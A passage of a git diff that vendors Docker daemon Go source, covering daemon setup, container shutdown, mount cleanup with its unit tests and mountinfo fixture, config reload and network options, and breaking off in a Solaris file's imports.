+ return nil, err + } + + sysInfo := sysinfo.New(false) + // Check if Devices cgroup is mounted, it is hard requirement for container security, + // on Linux. 
+ if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled { + return nil, fmt.Errorf("Devices cgroup isn't mounted") + } + + d.ID = trustKey.PublicKey().KeyID() + d.repository = daemonRepo + d.containers = container.NewMemoryStore() + d.execCommands = exec.NewStore() + d.referenceStore = referenceStore + d.distributionMetadataStore = distributionMetadataStore + d.trustKey = trustKey + d.idIndex = truncindex.NewTruncIndex([]string{}) + d.statsCollector = d.newStatsCollector(1 * time.Second) + d.defaultLogConfig = containertypes.LogConfig{ + Type: config.LogConfig.Type, + Config: config.LogConfig.Config, + } + d.EventsService = eventsService + d.volumes = volStore + d.root = config.Root + d.uidMaps = uidMaps + d.gidMaps = gidMaps + d.seccompEnabled = sysInfo.Seccomp + + d.nameIndex = registrar.NewRegistrar() + d.linkIndex = newLinkIndex() + d.containerdRemote = containerdRemote + + go d.execCommandGC() + + d.containerd, err = containerdRemote.Client(d) + if err != nil { + return nil, err + } + + if err := d.restore(); err != nil { + return nil, err + } + + // FIXME: this method never returns an error + info, _ := d.SystemInfo() + + engineVersion.WithValues( + dockerversion.Version, + dockerversion.GitCommit, + info.Architecture, + info.Driver, + info.KernelVersion, + info.OperatingSystem, + ).Set(1) + engineCpus.Set(float64(info.NCPU)) + engineMemory.Set(float64(info.MemTotal)) + + // set up SIGUSR1 handler on Unix-like systems, or a Win32 global event + // on Windows to dump Go routine stacks + stackDumpDir := config.Root + if execRoot := config.GetExecRoot(); execRoot != "" { + stackDumpDir = execRoot + } + d.setupDumpStackTrap(stackDumpDir) + + return d, nil +} + +func (daemon *Daemon) shutdownContainer(c *container.Container) error { + stopTimeout := c.StopTimeout() + // TODO(windows): Handle docker restart with paused containers + if c.IsPaused() { + // To terminate a process in freezer cgroup, we should send + // SIGTERM to this process then unfreeze it, 
and the process will + // force to terminate immediately. + logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID) + sig, ok := signal.SignalMap["TERM"] + if !ok { + return fmt.Errorf("System does not support SIGTERM") + } + if err := daemon.kill(c, int(sig)); err != nil { + return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err) + } + if err := daemon.containerUnpause(c); err != nil { + return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err) + } + if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil { + logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout) + sig, ok := signal.SignalMap["KILL"] + if !ok { + return fmt.Errorf("System does not support SIGKILL") + } + if err := daemon.kill(c, int(sig)); err != nil { + logrus.Errorf("Failed to SIGKILL container %s", c.ID) + } + c.WaitStop(-1 * time.Second) + return err + } + } + // If container failed to exit in stopTimeout seconds of SIGTERM, then using the force + if err := daemon.containerStop(c, stopTimeout); err != nil { + return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err) + } + + c.WaitStop(-1 * time.Second) + return nil +} + +// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers, +// and is limited by daemon's ShutdownTimeout. +func (daemon *Daemon) ShutdownTimeout() int { + // By default we use daemon's ShutdownTimeout. + shutdownTimeout := daemon.configStore.ShutdownTimeout + + graceTimeout := 5 + if daemon.containers != nil { + for _, c := range daemon.containers.List() { + if shutdownTimeout >= 0 { + stopTimeout := c.StopTimeout() + if stopTimeout < 0 { + shutdownTimeout = -1 + } else { + if stopTimeout+graceTimeout > shutdownTimeout { + shutdownTimeout = stopTimeout + graceTimeout + } + } + } + } + } + return shutdownTimeout +} + +// Shutdown stops the daemon. 
+func (daemon *Daemon) Shutdown() error { + daemon.shutdown = true + // Keep mounts and networking running on daemon shutdown if + // we are to keep containers running and restore them. + + if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil { + // check if there are any running containers, if none we should do some cleanup + if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil { + return nil + } + } + + if daemon.containers != nil { + logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.configStore.ShutdownTimeout) + daemon.containers.ApplyAll(func(c *container.Container) { + if !c.IsRunning() { + return + } + logrus.Debugf("stopping %s", c.ID) + if err := daemon.shutdownContainer(c); err != nil { + logrus.Errorf("Stop container error: %v", err) + return + } + if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil { + daemon.cleanupMountsByID(mountid) + } + logrus.Debugf("container stopped %s", c.ID) + }) + } + + if daemon.volumes != nil { + if err := daemon.volumes.Shutdown(); err != nil { + logrus.Errorf("Error shutting down volume store: %v", err) + } + } + + if daemon.layerStore != nil { + if err := daemon.layerStore.Cleanup(); err != nil { + logrus.Errorf("Error during layer Store.Cleanup(): %v", err) + } + } + + // Shutdown plugins after containers and layerstore. Don't change the order. + daemon.pluginShutdown() + + // trigger libnetwork Stop only if it's initialized + if daemon.netController != nil { + daemon.netController.Stop() + } + + if err := daemon.cleanupMounts(); err != nil { + return err + } + + return nil +} + +// Mount sets container.BaseFS +// (is it not set coming in? why is it unset?) 
+func (daemon *Daemon) Mount(container *container.Container) error { + dir, err := container.RWLayer.Mount(container.GetMountLabel()) + if err != nil { + return err + } + logrus.Debugf("container mounted via layerStore: %v", dir) + + if container.BaseFS != dir { + // The mount path reported by the graph driver should always be trusted on Windows, since the + // volume path for a given mounted layer may change over time. This should only be an error + // on non-Windows operating systems. + if container.BaseFS != "" && runtime.GOOS != "windows" { + daemon.Unmount(container) + return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')", + daemon.GraphDriverName(), container.ID, container.BaseFS, dir) + } + } + container.BaseFS = dir // TODO: combine these fields + return nil +} + +// Unmount unsets the container base filesystem +func (daemon *Daemon) Unmount(container *container.Container) error { + if err := container.RWLayer.Unmount(); err != nil { + logrus.Errorf("Error unmounting container %s: %s", container.ID, err) + return err + } + + return nil +} + +// V4Subnets returns the IPv4 subnets of networks that are managed by Docker. +func (daemon *Daemon) V4Subnets() []net.IPNet { + var subnets []net.IPNet + + managedNetworks := daemon.netController.Networks() + + for _, managedNetwork := range managedNetworks { + v4Infos, _ := managedNetwork.Info().IpamInfo() + for _, v4Info := range v4Infos { + if v4Info.IPAMData.Pool != nil { + subnets = append(subnets, *v4Info.IPAMData.Pool) + } + } + } + + return subnets +} + +// V6Subnets returns the IPv6 subnets of networks that are managed by Docker. 
+func (daemon *Daemon) V6Subnets() []net.IPNet { + var subnets []net.IPNet + + managedNetworks := daemon.netController.Networks() + + for _, managedNetwork := range managedNetworks { + _, v6Infos := managedNetwork.Info().IpamInfo() + for _, v6Info := range v6Infos { + if v6Info.IPAMData.Pool != nil { + subnets = append(subnets, *v6Info.IPAMData.Pool) + } + } + } + + return subnets +} + +// GraphDriverName returns the name of the graph driver used by the layer.Store +func (daemon *Daemon) GraphDriverName() string { + return daemon.layerStore.DriverName() +} + +// GetUIDGIDMaps returns the current daemon's user namespace settings +// for the full uid and gid maps which will be applied to containers +// started in this instance. +func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) { + return daemon.uidMaps, daemon.gidMaps +} + +// GetRemappedUIDGID returns the current daemon's uid and gid values +// if user namespaces are in use for this daemon instance. If not +// this function will return "real" root values of 0, 0. +func (daemon *Daemon) GetRemappedUIDGID() (int, int) { + uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) + return uid, gid +} + +// tempDir returns the default directory to use for temporary files. +func tempDir(rootDir string, rootUID, rootGID int) (string, error) { + var tmpDir string + if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" { + tmpDir = filepath.Join(rootDir, "tmp") + } + return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID) +} + +func (daemon *Daemon) setupInitLayer(initPath string) error { + rootUID, rootGID := daemon.GetRemappedUIDGID() + return initlayer.Setup(initPath, rootUID, rootGID) +} + +func setDefaultMtu(config *Config) { + // do nothing if the config does not have the default 0 value. 
+ if config.Mtu != 0 { + return + } + config.Mtu = defaultNetworkMtu +} + +func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) { + volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID) + if err != nil { + return nil, err + } + + volumedrivers.RegisterPluginGetter(daemon.PluginStore) + + if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) { + return nil, fmt.Errorf("local volume driver could not be registered") + } + return store.New(daemon.configStore.Root) +} + +// IsShuttingDown tells whether the daemon is shutting down or not +func (daemon *Daemon) IsShuttingDown() bool { + return daemon.shutdown +} + +// initDiscovery initializes the discovery watcher for this daemon. +func (daemon *Daemon) initDiscovery(config *Config) error { + advertise, err := parseClusterAdvertiseSettings(config.ClusterStore, config.ClusterAdvertise) + if err != nil { + if err == errDiscoveryDisabled { + return nil + } + return err + } + + config.ClusterAdvertise = advertise + discoveryWatcher, err := initDiscovery(config.ClusterStore, config.ClusterAdvertise, config.ClusterOpts) + if err != nil { + return fmt.Errorf("discovery initialization failed (%v)", err) + } + + daemon.discoveryWatcher = discoveryWatcher + return nil +} + +// Reload reads configuration changes and modifies the +// daemon according to those changes. +// These are the settings that Reload changes: +// - Daemon labels. +// - Daemon debug log level. +// - Daemon insecure registries. +// - Daemon max concurrent downloads +// - Daemon max concurrent uploads +// - Cluster discovery (reconfigure and restart). +// - Daemon live restore +// - Daemon shutdown timeout (in seconds). 
+func (daemon *Daemon) Reload(config *Config) (err error) { + + daemon.configStore.reloadLock.Lock() + + attributes := daemon.platformReload(config) + + defer func() { + // we're unlocking here, because + // LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes() + // holds that lock too. + daemon.configStore.reloadLock.Unlock() + if err == nil { + daemon.LogDaemonEventWithAttributes("reload", attributes) + } + }() + + if err := daemon.reloadClusterDiscovery(config); err != nil { + return err + } + + if config.IsValueSet("labels") { + daemon.configStore.Labels = config.Labels + } + if config.IsValueSet("debug") { + daemon.configStore.Debug = config.Debug + } + if config.IsValueSet("insecure-registries") { + daemon.configStore.InsecureRegistries = config.InsecureRegistries + if err := daemon.RegistryService.LoadInsecureRegistries(config.InsecureRegistries); err != nil { + return err + } + } + if config.IsValueSet("live-restore") { + daemon.configStore.LiveRestoreEnabled = config.LiveRestoreEnabled + if err := daemon.containerdRemote.UpdateOptions(libcontainerd.WithLiveRestore(config.LiveRestoreEnabled)); err != nil { + return err + } + } + + // If no value is set for max-concurrent-downloads we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. 
+ if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil { + *daemon.configStore.MaxConcurrentDownloads = *config.MaxConcurrentDownloads + } else { + maxConcurrentDownloads := defaultMaxConcurrentDownloads + daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads + } + logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads) + if daemon.downloadManager != nil { + daemon.downloadManager.SetConcurrency(*daemon.configStore.MaxConcurrentDownloads) + } + + // If no value is set for max-concurrent-upload we assume it is the default value + // We always "reset" as the cost is lightweight and easy to maintain. + if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil { + *daemon.configStore.MaxConcurrentUploads = *config.MaxConcurrentUploads + } else { + maxConcurrentUploads := defaultMaxConcurrentUploads + daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads + } + logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads) + if daemon.uploadManager != nil { + daemon.uploadManager.SetConcurrency(*daemon.configStore.MaxConcurrentUploads) + } + + if config.IsValueSet("shutdown-timeout") { + daemon.configStore.ShutdownTimeout = config.ShutdownTimeout + logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout) + } + + // We emit daemon reload event here with updatable configurations + attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug) + attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled) + + if daemon.configStore.InsecureRegistries != nil { + insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries) + if err != nil { + return err + } + attributes["insecure-registries"] = string(insecureRegistries) + } else { + attributes["insecure-registries"] = "[]" + } + + attributes["cluster-store"] = daemon.configStore.ClusterStore + if 
daemon.configStore.ClusterOpts != nil { + opts, err := json.Marshal(daemon.configStore.ClusterOpts) + if err != nil { + return err + } + attributes["cluster-store-opts"] = string(opts) + } else { + attributes["cluster-store-opts"] = "{}" + } + attributes["cluster-advertise"] = daemon.configStore.ClusterAdvertise + + if daemon.configStore.Labels != nil { + labels, err := json.Marshal(daemon.configStore.Labels) + if err != nil { + return err + } + attributes["labels"] = string(labels) + } else { + attributes["labels"] = "[]" + } + + attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads) + attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads) + attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout) + + return nil +} + +func (daemon *Daemon) reloadClusterDiscovery(config *Config) error { + var err error + newAdvertise := daemon.configStore.ClusterAdvertise + newClusterStore := daemon.configStore.ClusterStore + if config.IsValueSet("cluster-advertise") { + if config.IsValueSet("cluster-store") { + newClusterStore = config.ClusterStore + } + newAdvertise, err = parseClusterAdvertiseSettings(newClusterStore, config.ClusterAdvertise) + if err != nil && err != errDiscoveryDisabled { + return err + } + } + + if daemon.clusterProvider != nil { + if err := config.isSwarmCompatible(); err != nil { + return err + } + } + + // check discovery modifications + if !modifiedDiscoverySettings(daemon.configStore, newAdvertise, newClusterStore, config.ClusterOpts) { + return nil + } + + // enable discovery for the first time if it was not previously enabled + if daemon.discoveryWatcher == nil { + discoveryWatcher, err := initDiscovery(newClusterStore, newAdvertise, config.ClusterOpts) + if err != nil { + return fmt.Errorf("discovery initialization failed (%v)", err) + } + daemon.discoveryWatcher = discoveryWatcher + } else { + if err == errDiscoveryDisabled { + // 
disable discovery if it was previously enabled and it's disabled now + daemon.discoveryWatcher.Stop() + } else { + // reload discovery + if err = daemon.discoveryWatcher.Reload(config.ClusterStore, newAdvertise, config.ClusterOpts); err != nil { + return err + } + } + } + + daemon.configStore.ClusterStore = newClusterStore + daemon.configStore.ClusterOpts = config.ClusterOpts + daemon.configStore.ClusterAdvertise = newAdvertise + + if daemon.netController == nil { + return nil + } + netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil) + if err != nil { + logrus.WithError(err).Warnf("failed to get options with network controller") + return nil + } + err = daemon.netController.ReloadConfiguration(netOptions...) + if err != nil { + logrus.Warnf("Failed to reload configuration with network controller: %v", err) + } + + return nil +} + +func isBridgeNetworkDisabled(config *Config) bool { + return config.bridgeConfig.Iface == disableNetworkBridge +} + +func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) { + options := []nwconfig.Option{} + if dconfig == nil { + return options, nil + } + + options = append(options, nwconfig.OptionExperimental(dconfig.Experimental)) + options = append(options, nwconfig.OptionDataDir(dconfig.Root)) + options = append(options, nwconfig.OptionExecRoot(dconfig.GetExecRoot())) + + dd := runconfig.DefaultDaemonNetworkMode() + dn := runconfig.DefaultDaemonNetworkMode().NetworkName() + options = append(options, nwconfig.OptionDefaultDriver(string(dd))) + options = append(options, nwconfig.OptionDefaultNetwork(dn)) + + if strings.TrimSpace(dconfig.ClusterStore) != "" { + kv := strings.Split(dconfig.ClusterStore, "://") + if len(kv) != 2 { + return nil, fmt.Errorf("kv store daemon config must be of the form KV-PROVIDER://KV-URL") + } + options = append(options, nwconfig.OptionKVProvider(kv[0])) + options = 
append(options, nwconfig.OptionKVProviderURL(kv[1])) + } + if len(dconfig.ClusterOpts) > 0 { + options = append(options, nwconfig.OptionKVOpts(dconfig.ClusterOpts)) + } + + if daemon.discoveryWatcher != nil { + options = append(options, nwconfig.OptionDiscoveryWatcher(daemon.discoveryWatcher)) + } + + if dconfig.ClusterAdvertise != "" { + options = append(options, nwconfig.OptionDiscoveryAddress(dconfig.ClusterAdvertise)) + } + + options = append(options, nwconfig.OptionLabels(dconfig.Labels)) + options = append(options, driverOptions(dconfig)...) + + if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 { + options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes)) + } + + if pg != nil { + options = append(options, nwconfig.OptionPluginGetter(pg)) + } + + return options, nil +} + +func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry { + out := make([]types.BlkioStatEntry, len(entries)) + for i, re := range entries { + out[i] = types.BlkioStatEntry{ + Major: re.Major, + Minor: re.Minor, + Op: re.Op, + Value: re.Value, + } + } + return out +} + +// GetCluster returns the cluster +func (daemon *Daemon) GetCluster() Cluster { + return daemon.cluster +} + +// SetCluster sets the cluster +func (daemon *Daemon) SetCluster(cluster Cluster) { + daemon.cluster = cluster +} + +func (daemon *Daemon) pluginShutdown() { + manager := daemon.pluginManager + // Check for a valid manager object. In error conditions, daemon init can fail + // and shutdown called, before plugin manager is initialized. 
+ if manager != nil { + manager.Shutdown() + } +} + +// PluginManager returns current pluginManager associated with the daemon +func (daemon *Daemon) PluginManager() *plugin.Manager { // set up before daemon to avoid this method + return daemon.pluginManager +} + +// PluginGetter returns current pluginStore associated with the daemon +func (daemon *Daemon) PluginGetter() *plugin.Store { + return daemon.PluginStore +} + +// CreateDaemonRoot creates the root for the daemon +func CreateDaemonRoot(config *Config) error { + // get the canonical path to the Docker root directory + var realRoot string + if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) { + realRoot = config.Root + } else { + realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root) + if err != nil { + return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err) + } + } + + uidMaps, gidMaps, err := setupRemappedRoot(config) + if err != nil { + return err + } + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return err + } + + if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_experimental.go b/vendor/github.com/docker/docker/daemon/daemon_experimental.go new file mode 100644 index 0000000000..fb0251d4af --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_experimental.go @@ -0,0 +1,7 @@ +package daemon + +import "github.com/docker/docker/api/types/container" + +func (daemon *Daemon) verifyExperimentalContainerSettings(hostConfig *container.HostConfig, config *container.Config) ([]string, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux.go b/vendor/github.com/docker/docker/daemon/daemon_linux.go new file mode 100644 index 0000000000..9bdf6e2b79 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_linux.go @@ -0,0 +1,80 @@ +package daemon + 
+import ( + "bufio" + "fmt" + "io" + "os" + "regexp" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/mount" +) + +func (daemon *Daemon) cleanupMountsByID(id string) error { + logrus.Debugf("Cleaning up old mountid %s: start.", id) + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return err + } + defer f.Close() + + return daemon.cleanupMountsFromReaderByID(f, id, mount.Unmount) +} + +func (daemon *Daemon) cleanupMountsFromReaderByID(reader io.Reader, id string, unmount func(target string) error) error { + if daemon.root == "" { + return nil + } + var errors []string + + regexps := getCleanPatterns(id) + sc := bufio.NewScanner(reader) + for sc.Scan() { + if fields := strings.Fields(sc.Text()); len(fields) >= 4 { + if mnt := fields[4]; strings.HasPrefix(mnt, daemon.root) { + for _, p := range regexps { + if p.MatchString(mnt) { + if err := unmount(mnt); err != nil { + logrus.Error(err) + errors = append(errors, err.Error()) + } + } + } + } + } + } + + if err := sc.Err(); err != nil { + return err + } + + if len(errors) > 0 { + return fmt.Errorf("Error cleaning up mounts:\n%v", strings.Join(errors, "\n")) + } + + logrus.Debugf("Cleaning up old mountid %v: done.", id) + return nil +} + +// cleanupMounts umounts shm/mqueue mounts for old containers +func (daemon *Daemon) cleanupMounts() error { + return daemon.cleanupMountsByID("") +} + +func getCleanPatterns(id string) (regexps []*regexp.Regexp) { + var patterns []string + if id == "" { + id = "[0-9a-f]{64}" + patterns = append(patterns, "containers/"+id+"/shm") + } + patterns = append(patterns, "aufs/mnt/"+id+"$", "overlay/"+id+"/merged$", "zfs/graph/"+id+"$") + for _, p := range patterns { + r, err := regexp.Compile(p) + if err == nil { + regexps = append(regexps, r) + } + } + return +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go new file mode 100644 index 0000000000..c40b13ba4c --- 
/dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go @@ -0,0 +1,104 @@ +// +build linux + +package daemon + +import ( + "strings" + "testing" +) + +const mountsFixture = `142 78 0:38 / / rw,relatime - aufs none rw,si=573b861da0b3a05b,dio +143 142 0:60 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw +144 142 0:67 / /dev rw,nosuid - tmpfs tmpfs rw,mode=755 +145 144 0:78 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666 +146 144 0:49 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw +147 142 0:84 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw +148 147 0:86 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755 +149 148 0:22 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset +150 148 0:25 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpu rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu +151 148 0:27 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpuacct rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuacct +152 148 0:28 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory +153 148 0:29 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices +154 148 0:30 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer +155 148 0:31 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio +156 148 0:32 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a 
/sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event +157 148 0:33 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb +158 148 0:35 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime - cgroup systemd rw,name=systemd +159 142 8:4 /home/mlaventure/gopath /home/mlaventure/gopath rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +160 142 8:4 /var/lib/docker/volumes/9a428b651ee4c538130143cad8d87f603a4bf31b928afe7ff3ecd65480692b35/_data /var/lib/docker rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +164 142 8:4 /home/mlaventure/gopath/src/github.com/docker/docker /go/src/github.com/docker/docker rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +165 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +166 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/hostname /etc/hostname rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +167 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/hosts /etc/hosts rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +168 144 0:39 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k +169 144 0:12 /14 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=000 +83 147 0:10 / /sys/kernel/security rw,relatime - securityfs 
none rw +89 142 0:87 / /tmp rw,relatime - tmpfs none rw +97 142 0:60 / /run/docker/netns/default rw,nosuid,nodev,noexec,relatime - proc proc rw +100 160 8:4 /var/lib/docker/volumes/9a428b651ee4c538130143cad8d87f603a4bf31b928afe7ff3ecd65480692b35/_data/aufs /var/lib/docker/aufs rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +115 100 0:102 / /var/lib/docker/aufs/mnt/0ecda1c63e5b58b3d89ff380bf646c95cc980252cf0b52466d43619aec7c8432 rw,relatime - aufs none rw,si=573b861dbc01905b,dio +116 160 0:107 / /var/lib/docker/containers/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k +118 142 0:102 / /run/docker/libcontainerd/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/rootfs rw,relatime - aufs none rw,si=573b861dbc01905b,dio +242 142 0:60 / /run/docker/netns/c3664df2a0f7 rw,nosuid,nodev,noexec,relatime - proc proc rw +120 100 0:122 / /var/lib/docker/aufs/mnt/03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d rw,relatime - aufs none rw,si=573b861eb147805b,dio +171 142 0:122 / /run/docker/libcontainerd/e406ff6f3e18516d50e03dbca4de54767a69a403a6f7ec1edc2762812824521e/rootfs rw,relatime - aufs none rw,si=573b861eb147805b,dio +310 142 0:60 / /run/docker/netns/71a18572176b rw,nosuid,nodev,noexec,relatime - proc proc rw +` + +func TestCleanupMounts(t *testing.T) { + d := &Daemon{ + root: "/var/lib/docker/", + } + + expected := "/var/lib/docker/containers/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/shm" + var unmounted int + unmount := func(target string) error { + if target == expected { + unmounted++ + } + return nil + } + + d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "", unmount) + + if unmounted != 1 { + t.Fatalf("Expected to unmount the shm (and the shm only)") + } +} + +func TestCleanupMountsByID(t *testing.T) { + d := &Daemon{ + root: "/var/lib/docker/", + } + + 
expected := "/var/lib/docker/aufs/mnt/03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d" + var unmounted int + unmount := func(target string) error { + if target == expected { + unmounted++ + } + return nil + } + + d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d", unmount) + + if unmounted != 1 { + t.Fatalf("Expected to unmount the auf root (and that only)") + } +} + +func TestNotCleanupMounts(t *testing.T) { + d := &Daemon{ + repository: "", + } + var unmounted bool + unmount := func(target string) error { + unmounted = true + return nil + } + mountInfo := `234 232 0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k` + d.cleanupMountsFromReaderByID(strings.NewReader(mountInfo), "", unmount) + if unmounted { + t.Fatalf("Expected not to clean up /dev/shm") + } +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_solaris.go b/vendor/github.com/docker/docker/daemon/daemon_solaris.go new file mode 100644 index 0000000000..2b4d8d0216 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_solaris.go @@ -0,0 +1,523 @@ +// +build solaris,cgo + +package daemon + +import ( + "fmt" + "net" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/reference" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libnetwork/drivers/solaris/bridge" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/netutils" + 